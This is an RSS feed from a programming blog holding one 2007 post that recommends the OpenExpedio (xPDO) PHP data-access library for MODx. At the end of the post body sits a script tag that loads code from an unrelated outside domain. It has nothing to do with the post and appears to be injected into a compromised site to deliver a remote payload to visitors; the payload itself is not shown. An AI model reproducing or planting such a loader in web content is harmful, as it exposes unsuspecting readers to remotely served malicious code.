<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Adventures In Programming &#187; cmf</title>
	<atom:link href="http://www.adventuresinprogramming.com/tags/cmf/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.adventuresinprogramming.com</link>
	<description>Adventures in programming</description>
	<lastBuildDate>Tue, 08 Jan 2008 10:38:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>xPDO</title>
		<link>http://www.adventuresinprogramming.com/2007/03/26/xpdo/</link>
		<comments>http://www.adventuresinprogramming.com/2007/03/26/xpdo/#comments</comments>
		<pubDate>Tue, 27 Mar 2007 05:18:50 +0000</pubDate>
		<dc:creator>Kodewulf</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Frameworks]]></category>
		<category><![CDATA[Libraries]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[cmf]]></category>
		<category><![CDATA[data access]]></category>
		<category><![CDATA[modx]]></category>
		<category><![CDATA[object-relational bridge]]></category>
		<category><![CDATA[openexpedio]]></category>
		<category><![CDATA[orb]]></category>
		<category><![CDATA[pdo]]></category>
		<category><![CDATA[xpdo]]></category>

		<guid isPermaLink="false">http://adventuresinprogramming.com.s22377.gridserver.com/2007/03/26/xpdo/</guid>
		<description><![CDATA[For those interested in data access libraries for PHP, the OpenExpedio project is well worth a look at. It will be part of the core for the upcoming release of MODx CMF. I haven&#8217;t had a chance to delve into the code to deeply, so any comments about your experiences with this library will be [...]]]></description>
			<content:encoded><![CDATA[<p>For those interested in data access libraries for PHP, the <a href="http://xpdo.org/" title="OpenExpedio">OpenExpedio</a> project is well worth a look at.  It will be part of the core for the upcoming release of <a href="http://modxcms.com/" title="MODx CMF">MODx CMF</a>. I haven&#8217;t had a chance to delve into the code to deeply, so any comments about your experiences with this library will be greatly appreciated.</p>
<blockquote><p>OpenExpedio is our name for open eXtensions to PDO. It&#8217;s a light-weight ORB (object-relational bridge) library that works on PHP 4 and 5, and takes advantage of the newly adopted standard for database persistence in PHP 5.1+, PDO. It implements the very simple, but effective Active Record pattern for data access.</p></blockquote>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adventuresinprogramming.com/2007/03/26/xpdo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
